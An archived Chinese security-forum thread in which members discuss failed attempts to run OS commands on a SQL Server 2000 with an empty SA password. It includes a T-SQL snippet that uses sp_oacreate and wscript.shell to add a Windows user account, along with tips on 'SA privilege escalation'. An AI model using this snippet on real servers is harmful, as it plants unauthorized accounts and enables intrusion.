邪恶八进制信息安全团队技术讨论组's Archiver

sky 2006-1-3 03:04

[讨论]SA空口令出现的问题

议题提交:Sky
信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])

WEB服务器和数据库一个服务器
用SQLBrowser(数据浏览器) 连上 执行XP_CMDSHELL 就提示一下错误信息
xpsql.cpp: 错误 5 来自 CreateProcess(第 543 行)

找了资料也没有找到解决办法 不知道怎么搞了!!

并且用 
declare @cmd INT
exec sp_oacreate 'wscript.shell',@cmd output
exec sp_oamethod @cmd,'run',null,'net user username password /add','0','true'
提示成功!
可事实上没有成功!


服务器是2000 server版本
一下是VERSION 返回的信息

Microsoft SQL Server  2000 - 8.00.194 (Intel X86)
   Aug  6 2000 00:57:48
   Copyright (c) 1988-2000 Microsoft Corporation
   Personal Edition on Windows NT 5.0 (Build 2195: Service Pack 4)

li瓏壹剑 2006-1-3 04:37

[quote][b]下面是引用sky于2006-01-03 03:04发表的[讨论]SA空口令出现的问题:[/b]
WEB服务器和数据库一个服务器

用SQLBrowser(数据浏览器) 连上 执行XP_CMDSHELL 就提示一下错误信息

xpsql.cpp: 错误 5 来自 CreateProcess(第 543 行)
.......[/quote]

l0op8ack 2006-1-3 11:55

试试这个办法吧
发在邪八没人管,贴到别的地方去了

[url]http://bbs.77169.com/read.php?tid=118452&fpage=1[/url]

heiren 2006-5-21 15:55

我也想知道这个问题如何解决。看了楼上发的文章,也是一头雾水,希望有人帮着解决。如何用SQL查询器,使用远程SQL语句填加用户。

trace 2006-10-5 00:08

遇见了同样的问题
恢复xp_cmdshell成功,但是执行看见的是这个。

wolfluxay 2006-12-19 20:25

同样的问题唉,没得解 [s:34]

遇见 2008-4-26 00:36

同样的问题额........没高手解答下?

jacksatan 2008-4-26 01:31

这个不是1句2句就可以解决的。有时候给你说这个了 未必就可以解决


jhackj 有做过2个sa提权 可以去看看 黑鹰有得下 搜jhackj就可以了

也可以试试沙盒.. 百度下 sa提权 资料有很多的:handshake:

you_kobe 2008-4-26 09:35

同样的问题,每次都没有成功

hum2049 2008-4-26 11:00

权限问题,你可能没遇到过,在bin那个目录设置权限,sql即使是sa也没有办法!

infofly 2008-4-30 19:37

必须要能连接到远程的1433才可以操作吧。如果sql注入呢?

19830821 2008-5-6 14:39

同样的问题哦,没的解

逗号 2008-5-11 23:56

cmd.exe 没得权限,除非你可以编辑xp_cmdshell这个存储过程

guizige 2008-5-13 05:24

回复 椅子 l0op8ack 的帖子

现在开启沙盘模式也不好用了啊

总是不成功

骑士精神 2008-5-16 12:12

也许在BIN那个目录有权限设置,无法提权

醉罪 2008-5-16 17:18

有没有可能sa是guest的权限呢

cheru4 2008-5-16 18:45

我碰到过降权 的 SA

页: [1]
© 1999-2008 EvilOctal Security Team